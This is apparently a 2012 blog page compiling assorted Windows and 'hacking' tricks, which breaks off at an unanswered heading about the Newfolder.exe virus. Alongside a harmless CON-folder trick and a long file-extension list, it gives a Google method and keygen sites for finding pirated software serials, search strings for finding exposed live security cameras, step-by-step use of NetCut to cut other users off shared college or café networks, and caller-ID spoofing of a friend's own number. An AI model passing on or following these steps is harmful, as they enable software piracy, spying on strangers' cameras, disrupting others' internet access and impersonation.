Wednesday 26 September 2012

How to create a CON folder in Windows

Can you create a folder named "CON” in windows?
The Answer is NO and YES!
Why the answer is NO.
NO because when create a new folder and try to rename it to any one of the above specified names, you know what happens! In Windows XP the folder name automatically changes back to "New Folder” no matter you try any number of times. Where as in Windows Vista/7 when you try to rename the file you get an error message "The specified device name is invalid”.

Why it is not possible to create a folder names CON?
Before we proceed further, let me tell you a small secret you can’t even create a folder named CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5,LPT6, LPT7, LPT8, and LPT9.and many others. YES the reason you can’t create a folder with these names is because these are reserved keywords used by DOS. The below list is taken from Microsoft’s website shows a list of reserved keywords in DOS.

NAME                         FUNCTION
CON                            Key board and display.
PRN                             System list device, usually a parallel port.
AUX                            Auxiliary Device, usually a serial port.
CLOCK$                     System real-time clock.
NUL                             Bit-bucket device.
A: - Z:                           Drive letters.
COM1                          First serial communication port.
LPT1                            First parallel printer port.
LPT2                            Second Parallel printer port.
LPT3                            Third Parallel printer port.
COM2                         Second serial communication port.
COM3                        Third serial communication port.
COM4                        Fourth serial communication port.

If you try creating a folder with any of these names, the name automatically changes back to the default "New Folder”. And this is what has caused the confusion. Instead of automatically renaming the folder, had an explanatory warning message popped up. Yes we can create a folder named CON. There is actually a way to create a folder named CON, or any other name from the above list of reserved keywords. This can be done through command prompt. But it is advisable not to do so, as it might result in your system becoming unstable. To create a folder named CON, go to command prompt and type "MD \\.\E:\CON” (without quotes). This will create a folder named CON in E:.
You cannot delete this folder by normal delete. To delete the folder, again go to command prompt and type
"RD \\.\E:\CON” without quotes.

How to find serial numbers on Google

This is a little trick that I usually use to find CD keys with Google.

HOW DOES THIS WORK?
Quite simple really.94FBRis part of an Office 2000 Pro CD key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and94fbr, you guarantee two things.
1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.
2) Because94FBRis part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

Step 1:- If you’re looking for a serial number for Nero (for example) go to google.com and type Nero 94FBR and it'll bring it up. This works great in Google.

You can also use some serial number providing sites like www.smartserials.com , www.keygenguru.com etc. for searching the serial number on any software

List of PC file Extensions

This is a list of the most commonly found extensions, what type of file they are and what program if any they are associated with.

.$$$ Temporary file
.$$A OS/2 program file
.$$F OS/2 database file
.$$S OS/2 spreadsheet file
. OS/2 planner file
.$DB DBASE IV temporary file
.$ED Microsoft C temporary editor file.
.$VM Microsoft Windows temporary file for virtual managers.
._DD Norton disk doctor recovery file.
._DM Nuts n Bolts disk minder recovery file.
.--- File used to backup sys, ini, dat, and other important files from Windows 3.1 and above.
.075 Ventura Publisher 75x75 dpi screen characters
.085 Ventura Publisher 85x85 dpi screen characters
.091 Ventura Publisher 91x91 dpi screen characters
.096 Ventura Publisher 96x96 dpi screen characters
.0B Pagemaker printer font LineDraw enhanced characters.
.1ST File used by some software manufacturers to represent a file that should be read first before starting the program.
.2GR File used in Windows 3.x to display the graphics on older 286 and 386 computers.
.386 Virtual machine support files for the 386 enhanced mode.
.3GR File used in Windows 3.x to display the graphics on later 386, 486 and Pentium computers.
.4SW 4DOS Swap file

A

A ADA program file or UNIX library
.A3W MacroMedia Authorware 3.5 file
.ABK Autobackup file used with Corel Draw 6 and above.
.ABR Brush file for Adobe Photoshop
.ACT Adobe Photoshop Color table file.
.AD After Dark file.
.ADF Adapter description files.
.ADM After Dark screen saver module.
.ADR After Dark randomizer
.AI Adobe Illustrator file.
.AIF Auto Interchange File Format (AIFF) Audio file.
.ANI Windows 95 / Windows 98 / Windows NT animated mouse cursor file.
.ANS ANSI text file.
.ARJ Compressed file can be used with Winzip / Pkzip.
.ASC ASCII Text file
.ASF Sort for Advanced Streaming Format, file developed by Microsoft. The .ASF file is generally a movie player and can
be open with software such as Windows Media Player.
.ASP Microsoft FrontPage Active Server Pages. To open these files use your internet browser.
.AVI Windows Movie file.

B

.BAK Backup file used for important windows files usually used with the System.ini and the Win.ini.
.BAS QBasic program and or Visual Basic Module.
.BAT Batch file that can perform tasks for you in dos, like a macro.
.BFC Microsoft Windows 95 / Windows 98 Briefcase file.
.BG Backgammon game file.
.BIN Translation tables for code pages other than the standard 437.
.BK2 Word Perfect for Windows Backup file
.BK3 Word Perfect for Windows Backup file
.BK4 Word Perfect for Windows Backup file
.BK5 Word Perfect for Windows Backup file
.BK6 Word Perfect for Windows Backup file
.BK7 Word Perfect for Windows Backup file
.BK8 Word Perfect for Windows Backup file
.BK9 Word Perfect for Windows Backup file
.BMP Graphical Bit Mapped File used in Windows Paintbrush.
.BNK Sim City Backup
.BPS Microsoft Works Word Processor File.
.BPT Corel Draw Bitmap master file
.BV1 Word Perfect for Windows Backup file
.BV2 Word Perfect for Windows Backup file
.BV3 Word Perfect for Windows Backup file
.BV4 Word Perfect for Windows Backup file
.BV5 Word Perfect for Windows Backup file
.BV6 Word Perfect for Windows Backup file
.BV7 Word Perfect for Windows Backup file
.BV8 Word Perfect for Windows Backup file
.BV9 Word Perfect for Windows Backup file
.BWP Battery Watch pro file.

C

.C C file used with the C programming language.
.CAB Cabinet file used in Windows 95 and Windows 98 that contains all the windows files and drivers. Information
about how to extract a .CAB file can be found on document CH000363.
.CAL Windows Calendar, Supercalculator4 file or Supercal spreadsheet.
.CBL COBOL Program File
.CBT Computer Based Training files.
.CDA CD Audio Player Track.
.CDR Corel Draw Vector file.
.CFB Comptons Multimedia file
.CFG Configuration file
.CFL Corel flowchart file
.CFM Corel FontMaster file / Cold Fusion Template file / Visual dBASE windows customer form
.CHK Scandisk file which is used to back up information that scandisk has found to be bad, found in C root. Because the information within these files are corrupted or reported as bad by Scandisk it is perfectly fine to delete these files, providing you are currently not missing any information. Additional information about scandisk can be found on our scandisk page.
.CL Generic LISP source code.
.CL3 Easy CD Creator layout file.
.CL4 Easy CD Creator layout file.
.CLA Java Class file.
.CLG Disk catalog database
.CLK Corel R.A.V.E. animation file.
.CLL Crick software clicker file
.CLO Cloe image
.CLP Windows Clipboard / Quattro Pro clip art / Clipper 5 compiler script
.CLR WinEdit Colorization word list / 1st reader binary color screen image / PhotStyler color definition
.CLS Visual Basic Class module / C++ Class definition
.CMD Windows Script File also OS/2 command file.
.CMV Corel Movie file.
.CNT Help file (.hlp) Contents (and other file contents)
.CPL Windows 95 / Windows 98 / Windows NT control panel icons.
.CNE Configuration file that builds .COM files.
.CNF Configuration file.
.COB COBOL source code file.
.COD FORTRAN Compiler program code
.COM File that can be executed.
.CPE Fax cover page file
.CPI Code Page Information or Microsoft Windows applet control panel file
.CPP C++ source code file.
.CRD Windows Card file.
.CSV Comma-Separated Variable file. Used primary with databases and spreadsheets / Image file used with CopuShow
.CUR Windows Mouse Cursor.
.CVS Canvas drawing file
.CXX C++ program file or Zortech C++ file

D

.DAT Data file, generally associated or extra data for a program to use.
.DB Paradox database file / Progress database file
.DB2 dBase II file
.DBC Microsoft Visiual Foxpro database container
.DBF dBase II,III,III+,IV / LotusWorks database.
.DBK dBase databse backup / Orcad schematic capture backup file
.DBM Cold Fusion template
.DBO dBase IV compiled program file
.DBQ Paradox memo
.DBT dBase database text file
.DBV Flexfile memo field file
.DBW DataBoss database file
.DBX Database file / DataBeam Image / MS Visual Foxpro Table
.DEV Device Driver
.DIF Document Interchange Format; VisiCalc
.DLL Dynamic Link Library; Allow executable code modules to be loaded on demand, linked at run time, and unloaded
when not needed. Windows uses these files to support foreign languages and international/nonstandard keyboards.
.DMO Demo file
.DMP Dump file
.DMD Visual dBASE data module
.DMF Delusion/XTracker Digital Music File
.DMO Demo file
.DMP Dump file
.DMS Compressed archive file
.DOC Microsoft Word Windows/DOS / LotusWorks word processor Windows/DOS /PF S:First Choice Windows/DOS
DOT MS Word Windows/DOS.
.DOS Text file and DOS Specification Info
.DOT Microsoft Word Template (Macro).
.DRV Device driver files that attach the hardware to Windows. The different drivers are system, keyboard, pointing
devices, sound, printer/ plotter, network, communications adapter.
.DRW Micrografx draw/graph files.
.DT_ Macintosh Data File Fork
.DTA Data file
.DTD SGML Document definition file
.DTF Q&A database
.DTM DigiRekker module
.DTP SecurDesk! Desktop / Timeworks Publisher Text Document / Pressworks Template file
.DUN Dialup Networking exported file.
.DX Document Imaging file / Digital data exchange file
.DXB Drawing interchange binary file
.DXF Autocad drawing interchange format file
.DXN Fujitsu dexNet fax document
.DXR Macromedia director projected movie file
.DYN Lotus 1-2-3 file
.DWG AutoCad Drawing Database

E

.EEB Button bar for Equation Editor in Word Perfect for Windows
.EFT CHIWRITER high resolution screen characters
.EGA EGA screen characters for Ventura Publisher
.ELG Event List text file used with Prosa
.EMS Enhanced Menu System configuration file for PC Tools
.EMU IRMA Workstation for Windows emulation
.ENC ADW Knowledge Ware Encyclopedia
.END Corel Draw Arrow Definition file
.ENG Sprint dictionary file engine
.ENV Word Perfect for Windows environment file.
.EPG Exported PaGe file used with DynaVox
.EPS Encapsulated Postscript, with embedded TIFF preview images.
.EQN Word Perfect for Windows Equation file
.ERD Entity Relation Diagram graphic file
.ERM Entity Relation Diagram model file
.ERR Error log file
.ESH Extended Shell Batch file
.EVT Event file scheduler file for PC Tools
.EX3 Device driver for Harvard graphics 3.0
.EXC QEMM exclude file from optimization file or Rexx program file
.EXE Executable file.
.EXT Extension file for Norton Commander

F

.FDF Adobe Acrobat Forms Document.
.FF AGFA CompuGraphics outline font description.
.FFA Microsoft Fast Find file.
.FFF GUS PnP bank / defFax fax document
.FFL Microsoft Fast Find file / PrintMaster Gold form file
.FFO Microsoft Fast Find file
.FFT DCA/FFT final form text
.FFX Microsoft Fast Find file
.FON Font files to support display and output devices.
.FR3 dBase IV renamed dBase III+ form
.FRF FontMonger Font
.FRG dBase IV uncompiled report
.FRK Compressed zip file used with Apple Macinotsh computers.
.FRM Form file used with various programs / Microsoft Visual Basic Form / FrameMaker document / FrameBuilder file /
Oracle executable form / Word Perfect Merge form / DataCAD symbol report file
.FRO dBase IV compiled report / FormFlow file
.FRP PerForm Pro Plus Form
.FRS WordPerfect graphics driver
.FRT FoxPro report file
.FRX Microsoft Visual basic binary form file / FoxPro report file
.FRZ FormFlow file

G

.GIF CompuServe Graphics Interchange Format.
.GR2 286 grabbers that specify which font to use with DOS and Windows.
.GR3 386 grabbers that specify which font to use with DOS and Windows.
.GRA Microsoft Flight simulator graphics file
.GRB Microsoft MS-DOS shell monitor
.GRF Micrografx draw/graph files.
.GRP Microsoft Program Group.
.GZ Compressed Archive file for GZip

H

.HBK Mathcad handbook file
.HDL Procomm Plus alternate download file listing
.HDR Procomm Plus message header
.HDX Help index
.HEX Hex dump
.HFI GEM HP font info
.HGL HP graphics language graphic
.HH C++ Header
.HHH Precompiled Header for Power C
.HHP Help data for Procomm Plus
.HLP Files that contain the Help feature used in windows, cannot be read from DOS.
.HQX Apple Macintosh Binhex text conversion file.
.HSQ Data files associated with the Qaz Trojan.
.HSS Photoshop Hue/Saturation information.
.HST History file / Procomm Plus History File / Host file.
.HTA Hypertext Application (run applications from HTML document).
.HTM Web page files containing HTML or other information found on the Internet.

I

.ICA Citrix file / IOCA graphics file
.ICB Targa Bitmap
.ICC Kodak printer image
.ICE Archive file
.ICL Icon library file
.ICM Image Color Matching profile file
.ICN Microsoft Windows Icon Manager.
.ICO Microsoft Windows Icondraw / Icon.
.ID Disk identification file.
.IDB Microsoft developer intermediate file, used with Microsoft Visual Studio
.IDD MIDI instruments definition
.IDE Integrated Development Environment configuration file
.IDF MIDI instruments drivers file
.IDQ Internet data query file
.IDX Index file
.IFF IFF/LBM (Amiga) used by Computer Eyes frame grabber.
.IMG GEM/IMG (Digital Research) or Ventura Publisher bitmap graphic
.INF Information file that contains customization options.
.INI Files that initialize Windows and Windows apps.
.IPF Installer Script File / OS/2 online documentation for Microsoft source files.
.ISO Compressed file used for an exact duplicate of a CD. .ISO files can be extracted or opened such programs as Win
Image that can be found on our shareware download section.
.IWA IBM Writing Assistant Text file.

J

.JAS Graphic
.JPG Graphic commonly used on the Internet and capable of being opened by most modern image editors.
.JS JavaScript file.
.JSB Henter-Joyce Jaws script binary file
.JSD eFAX jet suite document
.JSE JScript encoded script file
.JSH Henter-Joyce Jaws script header file
.JSL PaintShop pro file
.JSM Henter-Joyce Jaws script message file
.JSP Java server page
.JSS Henter-Joyce Jaws script source file
.JT JT fax file
.JTF JPEG tagged Interchange format file
.JTK Sun Java toolkit file
.JTP JetForm file
.JW Justwrite text file
.JWL Justwrite text file library
.JZZ Jazz spreadsheet

K

.KAR Karaoke File used with some audio players.
L
.LGC Program Use Log File (for Windows Program Use Optimization).
.LGO Contains the code for displaying the screen logo.
.LOG Contains the process of certain steps, such as when running scandisk it will usually keep a scandisk.log of what
occurred.
.LNK HTML link file used with Microsoft Internet Explorer.
.LWP Lotus Wordpro 96/97 file.

M

.MAC Macintosh macpaint files.
.MBX Microsoft Outlook Express mailbox file.
.MD Compressed Archive file
.MDA Microsoft Access Add-in / Microsoft Access 2 Workgroup.
.MDB Microsoft Access Database / Microsoft Access Application.
.MDE Microsoft Access Database File
.MDF Menu definition file
.MDL Digitrakker Music Module / Rational Rose / Quake model file
.MDM Telix Modem Definition
.MDN Microsoft Access Blank Database Template
.MDP Microsoft Developer Studio Project
.MDT Microsoft Access Add-in Data
.MDW Microsoft Access Workgroup Information
.MDX dBase IV Multiple Index
.MDZ Microsoft Access Wizard Template
.MEB WordPerfect Macro Editor bottom overflow file
.MED WordPerfect Macro Editor delete save / OctaMed tracker module
.MEM WordPerfect Macro Editor macro / Memory File of variables
.MID Midi orchestra files that are used to play with midi sounds built within the sound card.
.MIX Power C object file / Multiplayer Picture file (Microsoft Photodraw 2000 & Microsoft Picture It!) / Command &
Conquer Movie/Sound file
.MOD Winoldap files that support (with grabbers) data exchange between DOS apps and Windows apps.
.MOV File used with Quick Time to display a move.
.MP1 MPEG audio stream, layer I
.MP2 MPEG audio stream, layer II
.MP3 MPEG audio stream, layer III; High compressed audio files generally used to record audio tracks and store them in
a decent sized file available for playback. See our MP3 page for additional information.
.MPG MPEG movie file.
.MSN Microsoft Network document / Decent mission file
.MTF Windows metafile.
.MTH Derive Math file
.MTM Sound file / MultiTracker music module
.MTV Picture file
.MTW Minitab data file
.MU Quattro menu
.MUL Ultima Online game
.MUP Music publisher file
.MUS Audio file
.MVB Database file / Microsoft multimedia viewer file
.MVE Interplay video file
.MVF Movie stop frame file
.MWP Lotus Wordpro 97 smartmaster file
.MXD ArcInfo map file
.MXT Microsoft C Datafile
.MYD Make your point presentation file.

N

.N64 Nintendo 64 Emulator ROM image.
.NA2 Netscape Communicator address book.
.NAB Novell Groupwise address book
.NAP Napster Music security definition file.
.NDF NeoPlanet Browser file
.NDX Indexed file for most databases.
.NES Nintendo Entertainment system ROM image.
.NIL Norton guide online documentation
.NGF Enterasys Networks NetSight file.
.NHF Nero HFS-CD compilation or a general Nero file
.NIL Norton icon lybrary file.
.NLB Oracle 7 data file
.NLD ATI Radeon video driver file,
.NMI SwordSearcher file.
.NON LucasArts Star Wars - Tie fighter mouse options file.
.NOW Extension commonly used for readme text files.
.NRA Nero Audio CD file.
.NRB Nero CD-ROM boot file.
.NS2 Lotus Notes 2 database,
.NS5 Lotus Notes Domino file,
.NSO NetStudio easy web graphics file.
.NT Windows NT startup file.
.NUM File used with some Software Manufactures to store technical support numbers or other phone numbers, should
be readable from DOS and or Windows.

O

.OCA Control Typelib Cache.
.OCX Object Linking and Embedding (OLE) control extension.
.OLB Object library
.OLD Used for backups of important files incase they are improperly updated or deleted.
.OLE Object Linking and Embedding object file
.OLI Olivetti text file
.ORI Original file.

P

.PAB Personal Address Book, file used with Microsoft Outlook.
.PB WinFax Pro phone book file
.PBD PowerBuilder dynamic library / Faxit phone book file
.PBF Turtle Beach Pinnacle bank file
.PBK Microsoft phonebook file
.PBL PowerBuilder library file
.PBM UNIX portable bitmap fuke
.PBR PowerBuilder resource
.PBI Profiler binary input file
.PBM PBM portable bit map graphic
.PBO Profiler binary output
.PBT Profiler binary table
.PCX Microsoft Paint & PC Paintbrush Windows/DOS.
.PDA Bitmap graphic file
.PDB TACT data file
.PDD Adobe PhotoDeluxe Image.
.PDF Adobe Acrobat Reader file which can only be read by Adobe Acrobat (to get file downloaded Adobe Acrobat from
our Download Page.
.PDL Borland C++ project description language file.
.PDS Graphic file / Pldasm source code file.
.PDV Paintbrush printer driver.
.PDW Professional Draw document.
.PIC Picture / Viewer Frame Class.
.PIF Program Information File that configures a DOS app to run efficiently in windows.
.PJF Paintjet soft font file.
.PL Harvard palette file / PERL program file
.PL3 Harvard chart palette
.PLB Foxpro library / LogoShow Screensaver file
.PLC Lotus Add-in
.PLD PLD2 source file
.PLG REND386 / AVRIL file
.PLI Oracle 7 data description
.PLL Prelinked library
.PLM DisorderTracker2 module
.PLN WordPerfect spreadsheet file
.PLR Descent Pilot file
.PLS WinAmp MPEG playlist file / DisorderTracker 2 Sample file / Shoutcast file / MYOB data file
.PLT AutoCAD HPGL vector graphic plotter file / Gerber sign-making software file / Betley's CAD Microstation driver
configuration for plotting
.PLY Autodesk polygon
.PP Compressed archive file.
.PP4 Picture Publisher.
.PP5 Picture Publisher.
.PPA Power Point Add-in.
.PPB WordPerfect Print preview button bar.
.PPD PostScript Printer description.
.PPF Turtle Beach Pinnacle program file.
.PPI Microsoft PowerPoint graphic file.
.PPL Harvard (now Serif) Polaroid Palette Plus ColorKey Driver.
.PPM PBM Portable Pixelmap Graphic.
.PPO Clipper Preprocessor Output.
.PPP Serif PagePlus Publication.
.PPS Microsoft PowerPoint Slideshow.
.PPT Microsoft PowerPoint presentation.
.PPX Serif PagePlus publication.
.PPZ Microsoft PowerPoint Packaged Presentation.
.PS2 File to support the Micro Channel Architecture in 386 Enhanced mode.
.PSD Adobe Photoshop image file.
.PST Post Office Box file used with Microsoft Outlook usually mailbox.pst unless named otherwise.
.PWA Password agent file.
.PWD Password file.
.PWF ProCite Workforms
.PWL Password file used in Windows 95 and Windows 98 is stored in the Windows directory.
.PWP Photoworks image file
.PWZ PowerPoint wizard

Q

.QIC Windows backup file
.QT Quick Time Movie File
.QXD Quark Express file
.QXL Quark Xpress element library
.QXT Quark Xpress template file

R

.RA Real Audio file.
.RAM Real Audio file.
.RAR Compressed file similar to .ZIP uses different compression program to extract. See our recommended download
page for a program that can be used to extract .RAR files.
.RAS File extension used for raster graphic files.
.RD1 Descent registered level file
.RD3 Ray Dream designer graphics file / CorelDraw 3D file
.RD4 Ray Dream designer graphics file
.RD5 Ray Dream designer graphics file
.RDB TrueVector rules database
.RDF Resource description framework file / Chromeleon report definition
.RDL Descent registered level file / RadioDestiny radio stream
.RDX Reflex data file
.REC Sound file used with Windows Sound Recorder.
.RLE Microsoft Windows Run Length Encoded (Run Length Encoded (bitmap format) file that contains the actual screen
logo).
.RMI Microsoft RMID sound file.
.RPB Automotive diagnostic file.
.RPD Rapidfile database
.RPM Red Hat Package Manager / RealMedia Player file.
.RPT Various Report file
.RTF Rich Text Format file
.RWZ Microsoft Outlook rules wizard file

S

.SAV File that usually contains saved information such as a saved game.
.SC2 Maps used in Sim City 2000.
.SCP Dialup Networking script file.
.SCR Source files for the .INI files, or sometimes may be used as screen savers.
.SD Sound Designer I audio file
.SD2 Sound Designer II flattened file / Sound Designer II data fork file / SAS database file
.SDA StarOffice drawing file / SoftCuisine data archive
.SDC StarOffice spreadsheet
.SDD StarOffice presentation
.SDF Standard data format file / Schedule data file / System file format / Autodesk mapguide spatial data file
.SDK Roland S-series floppy disk image
.SDL SmartDraw library
.SDN Small archive
.SDR SmartDraw drawing
.SDS StarOffice chart file / Raw MIDI sample dump standard file
.SDT SmartDraw template
.SDV Semicolon divided value file
.SDW Sun Microsystems StarOffice file document file similar to the Microsoft Office .DOC file.
.SDX MIDI sample dump standard files compacted by SDX
.SEA Short for Self Extracting Archive. Compressed file used with the Macintosh.
.SH Archive file
.SH3 Harvard (now Serif) presentation file
.SHB Corel Background file
.SHG Hotspot Editor Hypergraphic
.SHK Macintosh Compressed Archive file
.SHM WordPerfect Shell Macro
.SHP 3D Studio Shapes File / other 3D related file
.SHR Archive file
.SHS Shell scrap object file
.SHW Corel presentation / WordPerfect Slide Show / Show File
.SLK Multiplan file.
.SND Sound Clip file / Raw unsigned PCM data / AKAI MPC-series sample / NeXT sound / Macintosh sound resource file
.SNG MIDI song
.SNM Netscape Mail
.SNO SNOBOL program file
.SNP Snapview snapshot file
.SUM Summary file.
.SWF Macromedia Flash file.
.SWP Extension used for the Windows Swap File usually Win386.Swp. This file is required by Windows and generally
can grow very large in size sometimes up to several hundred megs. This file is used to swap information between
currently running programs and or memory. If this file is deleted from the computer Windows will be unable to load
and will need to be reinstalled.
.SYS System and peripheral drivers.

T

.TDF Trace Definition File used with OS/2
.TGA Targa file
.TIF Tag Image Format that includes most 24-bit color.
.TLB Remote automation truelib files / OLE type library / Visual C++ type library
.TLD Tellix file
.TLE NASA two-line element set
.TLP Microsoft project timeline fie
.TLT Trellix web design file
.TLX Trellix data file
.TMP Temporary files.
.TRM Windows Terminal.
.TXT Text file that can be read from windows of from DOS by using the Edit, Type, or Edlin.

U

.UNI MikMod (UniMod) format file / Forcast Pro data file
.UNK Unknown file type, sometimes used when a file is received that cannot be identified
.UNX Text file generally associated with UNIX.
.URL File used with some browsers such as Internet Explorer linking you to different web pages. Internet Shortcut.

V

.VB VBScript file
.VBA vBase file
.VBD ActiveX file
.VBE VBScript encoded script file
.VBG Visual Basic group project file
.VBK VisualCADD backup file
.VBL User license control file
.VBP Visual Basic project file
.VBR Remote automation registration files
.VBS Microsoft Visual Basic Script file for quick programs and in some cases can be used as a virus file.
.VBW Visual Basic project workplace
.VBX Visual Basic extension file
.VBZ Wizard launch file
.VC VisiCalc Spreadsheet file.
.VCD VisualCADD Drawing file.
.VCE Natural MicroSystems voice file.
.VCF vCard File / Vevi Configuration file.
.VCS Microsoft Outlook vCalander file.
.VCT FoxPro class library.
.VCW Microsoft Visual C++ workbench information file.
.VCX FoxPro class library.
.VDA Targa bitmap
.VDD Short for Virtual Device Driver. Additional information can be found here.
.VDO VDOScript file
.VDX No such file extension - Likely you meant to .vxd
.VM Virtual Machine / Virtual Memory file.
.VMM Virtual Machine (Memory Manager) file.
.VMF Ventura font characteristics file / FaxWorks audio file
.VMH
.VS2 Roland-Bass transfer file.
.VSD Visio drawing.
.VSL GetRight download list file.
.VSS Visio stencil.
.VST Video Template / Truevision Vista graphic / Targa Bitmap/
.VSW Visio workspace file.
.VXD Windows system driver file allowing a driver direct access to the Windows Kernel, allowing for low level access to
hardware.

W

.WAB Microsoft Outlook Express personal address book.
.WAD File first found in IdSoftware games such as DOOM, Quake, as well as most new games similar to these.
.WAV Sound files in Windows open and played with sound recorder.
.WB1 Quattro Pro Notebook
.WB2 Quattro Pro Spreadsheet
.WBF Microsoft Windows Batch File
.WBK Wordperfect document / workbook
.WBT Winbatch batch file
.WCD Wordperfect macro token list
.WCM Microsoft Works data transmission file / Wordperfect Macro
.WCP Wordperfect product information description
.WDB Microsoft Works database
.WEB Web source code file
.WFM dBASE Form object
.WFN CorelDRAW font
.WFX Winfax data file
.WG1 Lotus 1-2-3 worksheet
.WG2 Lotus 1-2-3 for OS/2 worksheet
.WID Ventura publisher width table
.WIN Foxpro - dBASE window file
.WIZ Microsoft Publisher page wizard
.WK1 Lotus 1-2-3 all versions / LotusWorks spreadsheet.
.WK3 Lotus 1-2-3 for Windows /Lotus 1-2-3 Rel.3.
.WKS Lotus 1-2-3 Rel lA,2.0,2.01, also file used with Microsoft Works.
.WLG Dr. Watson log file.
.WMA Windows Media Audio file.
.WMF Windows Metafile. Also see WMF dictionary definition.
.WMZ Windows Media Player theme package file.
.WPD WordPerfect Windows/DOS.
.WPG WordPerfect Graphical files Windows/DOS.
.WPM WordPerfect Macro file.
.WPS MS Works word processor Windows/DOS.
.WRI Windows Write.
.WRK Lotus 1-2 31.0,1.01,1.1/ Symphony 1,1.01.
.WRI Symphony l.1,1.2,2 / Microsoft Write file.

X

.XIF Wang image file / Xerox image file
.XLB Microsoft Excel File.
.XLS Microsoft Excel File.
.XM Sound file / Fast tracker 2 extended module
.XML Extensible markup language file.
.XNK Exchange shortcut
.XOT Xnetech job output file
.XPM X picsmap graphic
.XQT SuperCalc macro sheet
.XRF Cross Reference
.XR1 Epic MegaGames Xargon File
.XSL XML Style sheet
.XSM LEXIS-NEXIS tracker
.XTB LocoScript external translation table
.XWD X Windows dump file
.XWF Yamaha XG Works file
.XXE Xxencoded file
.XY XYWrite text file
.XY3 XYWrite text file
.XY4 XYwrite IV document
.XYP XYwrite III plus document
.XYW XYwrite Windows 4.0 document

Y

.Y Amiga YABBA compressed file archive
.Y01 Paradox index file
.Y02 Paradox index file
.Y03 Paradox index file
.Y04 Paradox index file
.Y05 Paradox index file
.Y06 Paradox index file
.Y07 Paradox index file
.Y08 Paradox index file
.Y09 Paradox index file
.YUV Yuv graphics file
.YZ YAC compressed file archive.

Z

.Z Compressed file that can hold thousands of files. To extract all the files Pkzip or Winzip will need to be used. UNIX /Linux users use the compress / uncompress command to extract these files.
.ZIP Compressed file that can hold thousands of files. To extract all the files Pkzip or Winzip will need to be used.

How to watch security cameras on internet

Step 1. Open internet your web browser.

Step 2. Go to a search engine of your choice (i.e. Google, Yahoo, etc.), and input any of the search commands as listed below.

Step 3. After you search one of these queries, you will see some search results, click on any one of them.

Step 4. Depending on the type of camera that you have access to, you may be able to control the camera like zoom, pan, and tilt the camera to see what you want to.

Step 5. Do not try to get onto password protected cameras, as this will not go unnoticed if too many attempts are made.

Some Commands to be Remember to Find Live CCTV Cameras.
  •  inurl:/view.shtml
  •  intitle:”Live View / – AXIS” | inurl:view/view.shtml^
  •  inurl:ViewerFrame?Mode=
  •  inurl:ViewerFrame?Mode=Refresh
  •  inurl:axis-cgi/jpg
  •  inurl:view/index.shtml
  •  inurl:view/view.shtml
  •  liveapplet
  •  intitle:liveapplet
  •  allintitle:”Network Camera NetworkCamera”
  •  intitle:axis intitle:”video server”
  •  intitle:liveapplet inurl:LvAppl
  •  intitle:”EvoCam” inurl:”webcam.html”
  •  intitle:”Live NetSnap Cam-Server feed”
  •  intitle:”Live View / – AXIS 206M”
  •  intitle:”Live View / – AXIS 206W”
  •  intitle:”Live View / – AXIS 210″

WEP cracking using Airo Wizard

In This Tutorial We Will learn to hack/crack the WEP (Wired Equipped Privacy).
A WEP key is a security code used on some Wi-Fi networks. WEP keys allow a group of devices on a local network (such as a home network) to exchange encoded messages with each other while hiding the contents of the messages from easy viewing by outsiders.
A WEP key is a sequence of hexadecimal digits. These digits include the numbers 0-9 and the letters A-F. Some examples of WEP keys are:
  1.  1A648C9FE2
  2.  99D767BAC38EA23B0C0176D15
WEP keys are chosen by a network administrator. WEP keys are set on Wi-Fi routers, adapters and other wireless network devices. Matching WEP keys must be set on each device for them to communicate with each other. The length of a WEP key depends on the type of WEP security (called "encryption") utilized:
  1.  40- / 64-bit WEP: 10 digit key
  2.  104- / 128-bit WEP: 26 digit key
To assist with the process of creating correct WEP keys, some brands of wireless network equipment automatically generates WEP keys from ordinary text called a pass phrase.
Air crack is an 802.11(protocol) WEP and WPA-PSK keys cracking application that is able to recover keys once enough data packets have been captured(Sniffed). It follows the standard FMS attack along with some optimizations like KoreK attacks, along with the all-new PTW attack, thus making the attack much faster and effective compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks and not much known by the crackers.

Download it from here



How to cut-off Internet connection in LAN/Wi-Fi

Hacking The Internet Connection of the shared computers in Colleges/ Cyber Cafe / schools etc. and gain the complete Access of internet with full speed.

Netcut stands for Network Cut. NetCut is software where we can control the connection to each computer/laptop in a WIFI network/LAN. However, this software can be used to retrieve internet bandwidth from other computers in a LAN/WIFI.

Shared connection speed is basically determined the number of users connected, topology is used, setting protocols and much more. If using a pure setting, the access speed will be divided based on the number of users who useit. 
Example: If the connection speed = 500 Kbps, and there are 5 users who use it, then the speed of each to 100 Kbps, except given the limit connection to other user. So more and more users connected, the smaller also access. And using this attack cut the internet connection of shared computers in LAN/WIFI. And Get the Full Speed of internet on your system.

Step 1:- you will need the NetCut 2.0 software so download it from Here.
Step2:- Unzip the downloaded Software and install it On Your System.
Step3:- Open the Software and you will get the following screen.
Step 4:- Select all or any One of the IP Addresses Seen on the Screen EXCEPT the first Two IP because they are Your PC's IP Address.
Step 5:- After Selecting the IP address Press the Cut off Button and the internet connection will be cut off within few Seconds.
Step 6:- To Resume or Start the Internet again Press the Resume Button and the internet will again start working in the shared computers.

Now after cutting the network connection Lets Study the Prevention from This attack so that this cannot happen with you.

Anti netCut. This software can protect you when you surf the Internet using wireless networks in particular hotspot areas which may be used by the netters. By using antinetcut, then guaranteed you will be protected from ignorant people who use netCut to control bandwidth, LAN and Wireless network. Why Anti netcut 2? No internet disconnection any more, starts with operating system; you don’t have to run every time turning on your PC. Lists all open ports in your connection (Security wise), Get your public IP address, Know who is cutting your connection, Direct link to internet connection speed meter, Direct link to spyware scanner, Direct link to free virus scanner and No Spyware

How to Call Your Friend from Their Own Number

Step 1:- Go to http://www.mobivox.com and register there for free account.

Step 2:- During registration, remember to insert your friends (Victims) mobile number in "Phone number" field

Step 3:- Complete registration and confirm your email id and then login to your account.

Step 4:- Click on "Direct WebCall" After successful Login into your Mobivox account.

Step 5:- You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.

Step 6:- That's it. Your friend will be shocked to see his own number calling him.

How To remove New Folder virus

What is Newfolder.exe?
